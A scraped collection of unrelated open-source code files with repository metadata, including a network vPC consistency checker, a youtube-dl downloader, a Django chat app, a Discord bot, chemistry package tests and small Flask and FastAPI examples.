192.168.11.103 cvd-1312-leaf all 7 vni vpc params are consistent
192.168.11.103 cvd-1312-leaf all 12 vlans vpc params are consistent
192.168.11.103 cvd-1312-leaf Po11 all 23 interface vpc port-channel params are consistent
192.168.11.103 cvd-1312-leaf Po12 all 23 interface vpc port-channel params are consistent
%
Example output when vpc po allowed-vlans are mismatched:
% ./vpc_consistency.py --vault hashicorp --devices cvd_leaf_2 --interface Po11,Po12
192.168.11.103 cvd-1312-leaf all 22 global vpc params are consistent
192.168.11.103 cvd-1312-leaf all 7 vni vpc params are consistent
192.168.11.103 cvd-1312-leaf all 12 vlans vpc params are consistent
192.168.11.103 cvd-1312-leaf Po11 Allowed VLANs
vpc-param-type: -
vpc-param-local-val: 1111-1112
vpc-param-peer-val: 1111
192.168.11.103 cvd-1312-leaf Po11 Local suspended VLANs
vpc-param-type: -
vpc-param-local-val: 1112
vpc-param-peer-val: -
192.168.11.103 cvd-1312-leaf Po12 all 23 interface vpc port-channel params are consistent
%
"""
our_version = 109
script_name = "vpc_consistency"
# standard libraries
import argparse
from concurrent.futures import ThreadPoolExecutor
# local libraries
from nxapi_netbox.args.args_cookie import ArgsCookie
from nxapi_netbox.args.args_nxapi_tools import ArgsNxapiTools
from nxapi_netbox.general.log import get_logger
from nxapi_netbox.netbox.netbox_session import netbox, get_device_mgmt_ip
from nxapi_netbox.vault.vault import get_vault
from nxapi_netbox.nxapi.nxapi_vpc_consistency import (
NxapiVpcConsistencyGlobal,
NxapiVpcConsistencyVni,
NxapiVpcConsistencyVlans,
NxapiVpcConsistencyInterface,
)
def get_parser():
help_interfaces = "a comma-separated list (no spaces) of port-channel interfaces to test for vpc consistency"
help_mismatched_labels = "display labels whose number of comma-separated entries differ from the number of values they refer to"
ex_interfaces = "Example: --interfaces Po1,Po10"
ex_mismatched_labels = "Example: --mismatched_labels"
parser = argparse.ArgumentParser(
description="DESCRIPTION: NXAPI: display inconsistent vpc parameters",
parents=[ArgsCookie, ArgsNxapiTools],
)
default = parser.add_argument_group(title="DEFAULT SCRIPT ARGS")
mandatory = parser.add_argument_group(title="MANDATORY SCRIPT ARGS")
parser.add_argument(
"--version", action="version", version="{} v{}".format("%(prog)s", our_version)
)
default.add_argument(
"--mismatched_labels",
dest="mismatched_labels",
required=False,
action="store_true",
default=False,
help="{} {}".format(help_mismatched_labels, ex_mismatched_labels),
)
default.add_argument(
"--interfaces",
dest="interfaces",
required=False,
default=None,
help="{} {}".format(help_interfaces, ex_interfaces),
)
return parser.parse_args()
def get_device_list():
try:
return cfg.devices.split(",")
except:
log.error(
"exiting. Cannot parse --devices {}. Example usage: --devices leaf_1,spine_2,leaf_2".format(
cfg.devices
)
)
exit(1)
def print_output(futures):
for future in futures:
output = future.result()
if output == None:
continue
for line in output:
print(line)
def show_inconsistent_params(ip, nx, interface=None):
lines = list()
if nx.error_reason != None:
log.error("{} {} error: {}".format(tb.sid, nx.hostname, nx.error_reason))
return lines
inconsistent_items = nx.inconsistent_params
if len(inconsistent_items) == 0:
if interface == None:
lines.append(
"{:<15} {:<20} all {} {} vpc params are consistent".format(
ip, nx.hostname, len(nx.info), nx.param_type
)
)
else:
lines.append(
"{:<15} {:<20} {} all {} {} vpc port-channel params are consistent".format(
ip, nx.hostname, interface, len(nx.info), nx.param_type
)
)
else:
for item in nx.inconsistent_params:
if interface == None:
lines.append(
"{:<15} {:<20} {}".format(ip, nx.hostname, item["vpc-param-name"])
)
else:
lines.append(
"{:<15} {:<20} {} {}".format(
ip, nx.hostname, interface, item["vpc-param-name"]
)
)
for key in item:
if key == "vpc-param-name":
continue
lines.append(" {}: {}".format(key, item[key]))
return lines
def show_mismatched_labels(ip, nx):
lines = list()
if cfg.mismatched_labels == False:
return lines
if len(nx.mismatched_info) > 0:
for label in nx.mismatched_info:
lines.append(
"{:<15} {:<20} vpc-param-name {}".format(ip, nx.hostname, label)
)
lines.append(" labels {}".format(nx.mismatched_info[label]["names"]))
lines.append(" values {}".format(nx.mismatched_info[label]["params"]))
return lines
def worker(device, vault):
ip = get_device_mgmt_ip(nb, device)
lines = list()
for class_name in [
NxapiVpcConsistencyGlobal,
NxapiVpcConsistencyVni,
NxapiVpcConsistencyVlans,
]:
nx = class_name(vault.nxos_username, vault.nxos_password, ip, log)
nx.nxapi_init(cfg)
nx.refresh()
if nx.error_reason != None:
lines.append("{} {} error: {}".format(ip, nx.hostname, nx.error_reason))
return lines
lines += show_inconsistent_params(ip, nx)
lines += show_mismatched_labels(ip, nx)
if cfg.interfaces == None:
return lines
for interface in cfg.interfaces.split(","):
nx = NxapiVpcConsistencyInterface(
vault.nxos_username, vault.nxos_password, ip, log
)
nx.nxapi_init(cfg)
nx.interface = interface
nx.refresh()
lines += show_inconsistent_params(ip, nx, interface)
return lines
cfg = get_parser()
log = get_logger(script_name, cfg.loglevel, "DEBUG")
vault = get_vault(cfg.vault)
vault.fetch_data()
nb = netbox(vault)
devices = get_device_list()
executor = ThreadPoolExecutor(max_workers=len(devices))
futures = list()
for device in devices:
args = [device, vault]
futures.append(executor.submit(worker, *args))
print_output(futures)
| allenrobel/nxapi-netbox | scripts/vpc_consistency.py | vpc_consistency.py | py | 6,995 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "nxapi_netbox.args.args_cookie.ArgsCookie",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "nxapi_netbox.args.args_nxapi_tools.ArgsNxapiTools",
"line_number": 63,
"... |
17791637310 | # Download the audio files for all of the video URLs given in the input file
import argparse
import os
import sys
youtube_cmd = \
"youtube-dl --extract-audio --audio-format mp3 -o \"{file_name}\" {url}"
def download_song(artist, song, url):
artist_part = '-'.join(artist.lower().split())
song_part = '-'.join(song.lower().split())
file_name = artist_part + "__" + song_part + ".%(ext)s"
return 0 == os.system(youtube_cmd.format(file_name=file_name, url=url))
# (Command returns 0 on success)
def mark_completed(f, line):
"""
Mark the song on the current line in the given file as downloaded. Change
the mark from `-` to `#`.
Args:
f (file) : A handle to the songs file, open at the current song
line (string) : The currently read line (containing the song)
Returns:
Nothing
NOTE: The file must be open in binary format.
"""
try:
marker_position = line.decode().index("| -") + 2 # add 2 to reach `-`
f.seek(-len(line), os.SEEK_CUR) # move back to the start of the current line
f.seek(marker_position, os.SEEK_CUR) # move to the position of the marker
f.write(b"#") # write the mark completed symbol (`-` -> `#`)
f.readline() # move to the next line (read past the current `\n`)
except ValueError:
# Could not find `-` marker
pass
except Exception as e:
# Here's a generic way for printing where the exception occurred
_, _, e_traceback = sys.exc_info()
print(f"Error:{e_traceback.tb_lineno}: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Download music from YouTube.")
parser.add_argument("-songs_file", type=str, help="list of songs to download")
parser.add_argument("-out_dir", type=str, help="download directory")
args = parser.parse_args()
if args.songs_file is None:
print("Please supply songs file")
exit(0)
elif args.out_dir is None:
print("Please supply download directory")
exit(0)
try:
os.listdir(args.out_dir)
except FileNotFoundError:
# Download directory does not exist, so create it
try:
os.mkdir(args.out_dir)
except:
print("Could not create download directory")
exit(0)
home_dir = os.getcwd()
with open(args.songs_file, 'rb+') as f:
# Move to download directory for placing songs
os.chdir(args.out_dir)
for line in f:
# Extract the song name and look up video, cleaning up white space
fields = [ field.strip() for field in line.decode().split('|') ]
song = fields[0]
artist = fields[1]
try:
url = fields[2]
try:
mark = fields[3]
if mark == '#':
print(f"Already downloaded: {song}")
continue
except IndexError:
# Song not marked with `-` or `#`
print(f"Mark not found: {song}")
continue
except IndexError:
# Cannot download this song
continue
if (download_song(artist, song, url)):
mark_completed(f, line)
if (home_dir != os.getcwd()):
# Return to original directory
os.chdir(home_dir)
| S0l0m4n/random-code | python/download_songs/youtube_download.py | youtube_download.py | py | 3,450 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.system",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.SEEK_CUR",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "os.SEEK_CUR",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "sys.exc_info",
"line_... |
15422153495 | from os import path
from setuptools import setup
# read the contents of your description file
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name="pyswahili",
version="0.1.4",
description="""
Python package for briding python english keywords
with swahili one to allow swahili speakers to learn the basics of coding
without ever knowing english
""",
long_description=long_description,
long_description_content_type='text/markdown',
url="https://github.com/Kalebu/pyswahili",
download_url='https://github.com/Kalebu/pyswahili/releases/tag/0.1',
author="Jordan Kalebu",
author_email="isaackeinstein@gmail.com",
license="MIT",
packages=["pyswahili"],
keywords=[
"pyswahili",
"python-tanzania",
"python-transpiler",
"swahili-python",
"python in swahili",
"python for swahili speakers",
"code python in swahili",
"swahili programming language",
"program in swahili",
],
entry_points={
"console_scripts": [
"pyswahili = pyswahili.__main__:main"
]
},
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Topic :: Software Development :: Build Tools",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
]
)
| Kalebu/pyswahili | setup.py | setup.py | py | 1,661 | python | en | code | 79 | github-code | 6 | [
{
"api_name": "os.path.abspath",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "os.path.dirname",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number"... |
37182738964 | from abc import ABC, abstractmethod
from typing import List
import requests
from config import EnvConfig
from models.Note import Card, DeckServiceCard
class DeckServiceAPIInterface(ABC):
@abstractmethod
def save_cards(self, user_id: str, deck_id: str, cards: List[Card]):
pass
class DeckServiceAPI(DeckServiceAPIInterface):
def __init__(self, config: EnvConfig):
self.DECK_SERVICE_HOST_NAME = config.DECK_SERVICE_HOST_NAME
def save_cards(
self, user_id: str, deck_id: str, cards: List[Card]
) -> List[DeckServiceCard]:
url = f"http://{self.DECK_SERVICE_HOST_NAME}/decks/{deck_id}/cards?userID={user_id}"
data = [{"deckID": deck_id, **card} for card in cards]
response = requests.post(url, json=data)
if response.status_code != 201:
raise Exception(
f"Failed to save cards. Status code: {response.status_code}. Response: {response.json()}"
)
response_body = response.json()
response_data: List[DeckServiceCard] = response_body["data"]
return response_data
| MoShrank/card-generation-service | external/DeckServiceAPI.py | DeckServiceAPI.py | py | 1,105 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "abc.ABC",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "models.Note.Card",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "abc.abstractmethod",
"line_nu... |
910883870 | import numpy as np, h5py as h5
from horton import * # pylint: disable=wildcard-import,unused-wildcard-import
from horton.part.test.common import get_proatomdb_cp2k
from horton.test.common import tmpdir
def test_db_basics():
padb = ProAtomDB.from_refatoms(numbers=[8, 1], max_cation=1, max_anion=1)
assert padb.get_numbers() == [1, 8]
assert padb.get_charges(8) == [1, 0, -1]
assert padb.get_charges(1) == [0, -1]
r1 = padb.get_record(8, -1)
assert r1.number == 8
assert r1.charge == -1
assert abs(r1.energy - -72.587) < 1e-3
assert r1.ipot_energy == padb.get_record(8, 0).energy - r1.energy
assert r1.population == 9
assert r1.pseudo_number == 8
assert r1.pseudo_population == 9
assert r1.safe
assert r1.rgrid.size == 59
r2 = padb.get_record(8, -1)
r3 = padb.get_record(8, 0)
assert r1 == r2
assert r1 != r3
assert padb.get_rgrid(8) is r1.rgrid
assert padb.get_record(8, +1).ipot_energy is None
assert padb.get_record(8, -1).ipot_energy == padb.get_record(8, 0).energy - padb.get_record(8, -1).energy
assert padb.get_record(1, 0).ipot_energy == -padb.get_record(1, 0).energy
def test_db_basics_pseudo():
padb = get_proatomdb_cp2k()
assert padb.get_numbers() == [8, 14]
assert padb.get_charges(8) == [2, 1, 0, -1, -2]
assert padb.get_charges(8, safe=True) == [2, 1, 0, -1]
assert padb.get_charges(14) == [0]
assert not padb.get_record(8, -2).safe
assert padb.get_rgrid(8) is padb.get_record(8, -2).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, -1).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 0).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 1).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 2).rgrid
r1 = padb.get_record(8, -1)
assert r1.safe
assert abs(r1.energy - -15.866511882272) < 1e-8
assert abs(r1.ipot_energy - (padb.get_record(8, 0).energy - r1.energy)) < 1e-5
r2 = padb.get_record(8, -2)
assert not r2.safe
assert abs(r2.energy - -15.464982778766) < 1e-8
assert abs(r2.ipot_energy - (r1.energy - r2.energy)) < 1e-5
assert padb.get_record(8, +2).ipot_energy is None
def test_record_basics_pseudo():
fn_out = context.get_fn('test/atom_si.cp2k.out')
mol = IOData.from_file(fn_out)
r = ProAtomRecord.from_iodata(mol)
assert r.number == 14
assert r.charge == 0
assert abs(r.energy - -3.761587698067) < 1e-10
assert r.ipot_energy is None
assert r.population == 14
assert r.pseudo_number == 4
assert r.pseudo_population == 4
assert r.safe
def compare_padbs(padb1, padb2):
assert padb1.size == padb2.size
for number in padb1.get_numbers():
for charge in padb1.get_charges(number):
r1 = padb1.get_record(number, charge)
r2 = padb2.get_record(number, charge)
assert r1 == r2
def test_io_group():
padb1 = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=1)
assert padb1.size == 5
keys = sorted(padb1._map.keys())
assert keys == [(1, -1), (1, 0), (6, -1), (6, 0), (6, +1)]
with h5.File('horton.dpart.test.test_proatomdb.test_io_group', "w", driver='core', backing_store=False) as f:
padb1.to_file(f)
padb2 = ProAtomDB.from_file(f)
compare_padbs(padb1, padb2)
def test_io_filename():
padb1 = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=0)
keys = sorted(padb1._map.keys())
assert keys == [(1, 0), (6, 0), (6, 1)]
with tmpdir('horton.dpart.test.test_proatomdb.test_io_filename') as dn:
filename = '%s/test.h5' % dn
padb1.to_file(filename)
padb2 = ProAtomDB.from_file(filename)
compare_padbs(padb1, padb2)
def test_compute_radii():
rgrid = RadialGrid(ExpRTransform(1e-3, 1e1, 100))
padb = ProAtomDB.from_refatoms([1, 6], 0, 0, (rgrid, 110))
record = padb.get_record(6, 0)
indexes, radii = record.compute_radii([2.0, 5.9, 5.999])
assert (indexes == [68, 89, 100]).all()
assert abs(radii - np.array([0.522305, 3.595831, 10.0])).max() < 1e-5
def test_moments():
padb = get_proatomdb_cp2k()
record0 = padb.get_record(8, 0)
record1 = padb.get_record(8, 1)
m0 = record0.get_moment(3)
m1 = record1.get_moment(3)
assert m0 > m1
assert abs(m0-21.84) < 1e-2
assert abs(m1-12.17) < 1e-2
def check_spline_record(spline, record):
assert abs(spline.y - record.rho).max() < 1e-10
assert abs(spline.dx - record.deriv).max() < 1e-10
def check_spline_pop(spline, pop):
rtf = spline.rtransform
check_pop = 4*np.pi*dot_multi(
rtf.get_deriv(),
rtf.get_radii()**2,
spline.y,
)
assert abs(pop - check_pop) < 1e-2
def check_spline_mono_decr(spline):
t = np.arange(0, spline.rtransform.npoint, 0.1)
x = spline.rtransform.radius(t)
y = spline(x)
i = (abs(y) < 1e-10).nonzero()[0][0]
y = y[:i]
assert ((y[1:] - y[:-1])/y[:-1]).min() < 1e-9
def test_get_spline():
padb = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=1)
spline = padb.get_spline(6)
check_spline_pop(spline, 6.0)
check_spline_record(spline, padb.get_record(6, 0))
check_spline_mono_decr(spline)
spline = padb.get_spline(6, -1)
check_spline_pop(spline, 7.0)
check_spline_record(spline, padb.get_record(6, -1))
check_spline_mono_decr(spline)
spline = padb.get_spline(6, {0:0.5, -1:0.5})
check_spline_pop(spline, 6.5)
check_spline_mono_decr(spline)
spline = padb.get_spline(1, {0:0.5})
check_spline_pop(spline, 0.5)
check_spline_mono_decr(spline)
def test_get_spline_pseudo():
padb = get_proatomdb_cp2k()
spline = padb.get_spline(8)
check_spline_pop(spline, 6.0)
check_spline_record(spline, padb.get_record(8, 0))
spline = padb.get_spline(8, -1)
check_spline_pop(spline, 7.0)
check_spline_record(spline, padb.get_record(8, -1))
spline = padb.get_spline(8, {0:0.5, -1:0.5})
check_spline_pop(spline, 6.5)
spline = padb.get_spline(14)
check_spline_pop(spline, 4.0)
check_spline_record(spline, padb.get_record(14, 0))
def test_compact():
padb = get_proatomdb_cp2k()
padb.compact(0.1)
assert padb.get_rgrid(8).size < 100
assert padb.get_rgrid(14).size < 100
def test_normalize():
padb = get_proatomdb_cp2k()
padb.compact(0.1)
padb.normalize()
for number in padb.get_numbers():
rgrid = padb.get_rgrid(number)
for charge in padb.get_charges(number):
r = padb.get_record(number, charge)
nel = rgrid.integrate(r.rho)
nel_integer = r.pseudo_number - charge
assert abs(nel - nel_integer) < 1e-10
def test_empty_proatom():
padb = get_proatomdb_cp2k()
assert (padb.get_rho(8, {}) == 0.0).all()
def test_io_atdens():
padb = ProAtomDB.from_file(context.get_fn('test/pro.atdens'))
assert padb.get_numbers() == [16]
assert padb.get_charges(16) == [3, 2]
r = padb.get_record(16, 3)
assert abs(r.rho[0] - 0.2628105459E+04) < 1e-5
assert abs(r.rho[-1] - 0.1998952826E-16) < 1e-5
s = padb.get_spline(16, 3)
assert abs(s(np.array([0.0])) - 2661.68659449) < 1e-5
radii = r.rgrid.rtransform.get_radii()
assert radii[0] == 0.5216488380E-03
assert abs(radii[-1] - 20) < 1e-14
assert abs(radii[1] - 0.5442350204E-03) < 1e-8
assert abs(r.rgrid.integrate(r.rho) - 13) < 1e-3
# check the basics of the get_rho method (charge)
rho1 = padb.get_rho(16, 3)
rho2, deriv = padb.get_rho(16, 3, do_deriv=True)
assert (rho1 == rho2).all()
assert deriv is None
# check the basics of the get_rho method (dict)
rho1 = padb.get_rho(16, {3:1})
rho2, deriv = padb.get_rho(16, {3:1}, do_deriv=True)
assert (rho1 == rho2).all()
assert deriv is None
| theochem/horton | horton/part/test/test_proatomdb.py | test_proatomdb.py | py | 7,845 | python | en | code | 83 | github-code | 6 | [
{
"api_name": "horton.part.test.common.get_proatomdb_cp2k",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "h5py.File",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "horton.test.common.tmpdir",
"line_number": 96,
"usage_type": "call"
},
{
"ap... |
36767766109 | '''
Author : knight_byte
File : A_Die_Roll.py
Created on : 2021-04-14 09:25:32
'''
from fractions import Fraction
def main():
y, w = map(int, input().split())
d = 6-max(y, w)+1
print(Fraction(d, 6) if d != 6 else "1/1")
if __name__ == '__main__':
main()
| arbkm22/Codeforces-Problemset-Solution | Python/A_Die_Roll.py | A_Die_Roll.py | py | 284 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "fractions.Fraction",
"line_number": 12,
"usage_type": "call"
}
] |
33625318941 | from util import logging
from training.util import monitor_loss
import tensorflow as tf
import streamlit as st
import os
import time
import numpy as np
import pandas as pd
def batch_loss(model, inp, aux, targ, loss_funct, opt = None):
loss = 0
with tf.GradientTape() as tape:
pred = model(inp, aux, training=True)
loss = loss_funct(targ, pred)
if opt is not None:
variables = model.trainable_variables
gradients = tape.gradient(loss, variables)
opt.apply_gradients(zip(gradients, variables))
#save model eager tf
checkpoint_dir = 'trained_model_dir'
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
checkpoint_prefix = os.path.join(checkpoint_dir, "ckpt")
root = tf.train.Checkpoint(optimizer=opt,
model=model)
root.save(checkpoint_prefix)
return loss
def training(model, nb_epochs, step_epoch, train_set, valid_set, loss_fct, valid_loss_fct, opt, patience, min_delta):
# Keep results for plotting
train_loss_results = []
valid_loss_results = []
steps_per_epoch = step_epoch
# early stopping
patience_cnt = 0
logging.info('Training started...')
start = time.time()
df = pd.DataFrame({'Loss': [], 'Loss Val': []})
chart = st.line_chart(df)
for epoch in range(nb_epochs):
## training
epoch_loss_avg = tf.keras.metrics.Mean()
for (batch, (inp_tot, targ)) in enumerate(train_set.take(steps_per_epoch)):
# define encoder and decoder inputs
inp, aux = inp_tot[0], inp_tot[1]
# loss for batch
batch_loss_results = batch_loss(model, inp, aux, targ, loss_fct, opt)
# training progress
epoch_loss_avg.update_state(batch_loss_results)
# collect training loss values
train_loss_results.append(epoch_loss_avg.result())
_Loss = epoch_loss_avg.result().numpy()
## validation
epoch_valid_loss_avg = tf.keras.metrics.Mean()
for (batch, (inp_tot, targ)) in enumerate(valid_set.take(steps_per_epoch)):
inp, aux = inp_tot[0], inp_tot[1]
batch_loss_results = batch_loss(model, inp, aux, targ, valid_loss_fct, None)
epoch_valid_loss_avg.update_state(batch_loss_results)
# collect training loss values
valid_loss_results.append(epoch_valid_loss_avg.result())
ValLoss = epoch_valid_loss_avg.result().numpy()
df = pd.DataFrame({'Loss': [_Loss],
'Loss Val': [ValLoss]})
chart.add_rows(df)
# early stopping
patience_cnt = monitor_loss(epoch, valid_loss_results, min_delta, patience_cnt)
if patience_cnt > patience:
logging.info("early stopping...")
break
if epoch % 50 == 0: #logging.info
st.text("Epoch {}: Loss MAE: {:.5f} --- Val Loss MAE: {:.5f}".format(epoch,
epoch_loss_avg.result(),
epoch_valid_loss_avg.result()))
logging.info('Time taken to train {} sec\n'.format(time.time() - start))
logging.info('Training finished...')
return model
| giobbu/ML-streamlit-apps | geo-ML/road-traffic-forecasting-belgium/training/train_module.py | train_module.py | py | 3,373 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "tensorflow.GradientTape",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
... |
34832241170 | import cv2
import numpy as np
img = np.zeros((600, 600, 3), np.uint8) #全为0表示是黑色
"""
img.shape[1]代表图片的宽度
img.shape[0]代表图片的高度(长度)
"""
#画直线
cv2.line(img, (0,0), (img.shape[1], img.shape[0]), (255,255,255), 2) #参数:物件、起始座标、终点座标、颜色、粗度
#画方型 (cv2.FILLED代表填满)
cv2.rectangle(img, (100, 100), (200, 200), (0,255,255), 2)
cv2.rectangle(img, (400, 400), (500, 500), (0,255,255), cv2.FILLED) #参数:物件、起始座标、终点座标、颜色、粗度
#画圆形
cv2.circle(img, (300, 300), 100, (0,0,255), 2) #参数:物件、圆心、半径、颜色、粗度
#画椭圆形
cv2.ellipse(img , (300, 300), (50, 100), 45, 0, 360, (255, 0, 0), cv2.FILLED) #参数:物件、(水平半轴,垂直半轴)、旋转角度、起始角度、终止角度、颜色、粗度
#写字(不支援中文)
cv2.putText(img, "Hello", (300, 300), cv2.FONT_HERSHEY_COMPLEX, 1, (255,255,255), 1) #参数:物件、文字、文字左下方的座标、字体、文字大小、颜色、粗度
cv2.imshow("img", img)
cv2.waitKey(0) | jim2832/Image-Recognition | draw.py | draw.py | py | 1,114 | python | zh | code | 0 | github-code | 6 | [
{
"api_name": "numpy.zeros",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "cv2.line",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "cv2.rectangle",
"line_number"... |
4352669045 | from flask import Flask, render_template, request, redirect, session
app = Flask(__name__)
app.secret_key = "No secrets on github or youtube"
@app.route('/')
def index():
return render_template('index.html')
@app.route('/submit', methods=['POST'])
def submit():
print(request.form)
session['name'] = request.form['name']
session['age'] = request.form['age']
return redirect('/display')
@app.route('/display')
def display():
name = session['name']
return render_template('display.html', name=name, age=submit['age'])
if __name__ == '__main__':
app.run(debug = True) | kwersland/coding_dojo-Python | flask/fundamentals/post_form/server.py | server.py | py | 601 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask.Flask",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "flask.request.form",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "flask.request... |
23312692887 | import discord
import os
from data_loader import input_text_parser
from data_loader import input_image_parser
image_path = "./images"
text_path = "./text"
token = open("token.txt", "r").read()
# change cwd in case this is called from shell script
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# create data objects, reading in data
text_data = input_text_parser(text_path)
file_data = input_image_parser(image_path)
client = discord.Client(intents=discord.Intents.all())
@client.event
async def on_ready():
print(f'{client.user} has connected to Discord')
@client.event
async def on_message(message):
"""
Main work method, called whenever someone posts a message
"""
# don't respond to self, empty messages, or messages that don't start with a bang
if message.author == client.user or \
len(message.content) == 0 or \
message.content[0] != '!':
return
out_str = None
out_file = None
# clean message
cmd = message.content[1:].strip().lower()
# bot info
if cmd == "encyclopedia bottanica":
out_str = "I am an encyclopedia. Enter '!toc' or '!contents' for a table of contents.\n" + \
"Enter '!<entry name>' to view an entry. I am case-insensitive."
# user requests table of contents
if cmd == "contents" or cmd == "toc":
out_str = f"I have information on the following categories:\n{text_data.get_contents()}\n" + \
f"and can share the following files:\n{file_data.get_contents()}"
else:
# get usual output
out_str = text_data.get(cmd)
out_file = file_data.get(cmd)
# print results
if out_file != None:
await message.channel.send(file=out_file)
if out_str != None:
await message.channel.send(out_str)
# fire this bad boy up
client.run(token) | WireHallMedic/Encyclopedia-Bottanica | encyclopedia_bottanica.py | encyclopedia_bottanica.py | py | 1,802 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.chdir",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_num... |
28352614903 | from django.shortcuts import render, HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth import login, authenticate, logout
from django.core.context_processors import csrf
from django.views.decorators.csrf import csrf_protect
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.views.generic import View
from django.utils.decorators import method_decorator
from django.http import (
JsonResponse
)
from django.core import serializers
from second.models import Message
class AddMessageView(View):
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(AddMessageView, self).dispatch(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
new_msg = Message()
new_msg.from_user = request.user
try:
to_user = User.objects.get(username=request.POST['to'])
except:
response = {'success':False, 'msg':'To user does not exist'}
return JsonResponse(response)
new_msg.to_user = to_user
new_msg.text = request.POST['text']
new_msg.save()
return JsonResponse({'success':True, 'msg':"message successfully sent"})
class GetAllMessages(View):
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(GetAllMessages, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
user = request.user
username = request.GET['user']
try:
other_user = User.objects.get(username=username)
except:
response = {'success':False, 'msg': 'User does not exist'}
return JsonResponse(response)
msgs = list(Message.objects.filter(from_user=user, to_user=other_user))
msgs_tmp = list(Message.objects.filter(from_user=other_user, to_user=user))
msgs+=msgs_tmp
msgs.sort(key=lambda x: x.time, reverse=True)
all_msgs = [msg.to_dict() for msg in msgs]
return JsonResponse(all_msgs, safe=False)
class GetAllUsers(View):
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(GetAllUsers, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
user = request.user
msgs = Message.objects.filter(from_user=user)
users = [msg.to_user for msg in msgs]
msgs = Message.objects.filter(to_user=user)
users_tmp = [msg.from_user for msg in msgs]
users+=users_tmp
users = list(set(users))
# users = serializers.serialize('json', users)
users = [{"username":user.username, "name":
user.first_name+" "+user.last_name} for user in users]
return JsonResponse(users, safe=False)
| sanjayramesh005/chat-app | second/views.py | views.py | py | 2,958 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.views.generic.View",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "django.utils.decorators.method_decorator",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.decorators.login_required",
"line_number": 20,
"us... |
4492425254 | import xml.etree.ElementTree as ET
from fastapi import FastAPI, Path
from fastapi.responses import Response
app = FastAPI()
@app.get("/IF01/{name}")
async def get(
name: str = Path(title="名前"),
):
root = ET.Element("root")
# 「番号タグ」というどうしようもないゴミ
nameElement = ET.SubElement(root, "DT0001")
nameElement.text = name
birthday = ET.SubElement(root, "DT0002")
birthday.text = "19700101"
address = ET.SubElement(root, "DT0003")
address.text = "神奈川県横浜市以下略"
gender = ET.SubElement(root, "DT0004")
gender.text = "1"
xml_data = ET.tostring(root, encoding="shift_jis", xml_declaration=True)
response = Response(content=xml_data, media_type="application/xml; charset=shift_jis")
return response
| ikemo3/conveni-pdf-example | terrible-api/src/main.py | main.py | py | 809 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "fastapi.Path",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "xml.etree.ElementTree.Element",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "xml.etree.E... |
35428259157 | import pickle
from typing import List, Tuple
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
def plot_segments(
true_segment_list: List[Tuple[float, float]],
pred_segment_list: List[Tuple[float, float]],
t_min: float = None,
t_max: float = None,
zoom: bool = True,
marker_list: List[int] = None,
):
"""Display true and predicted timecodes on a common timeline.
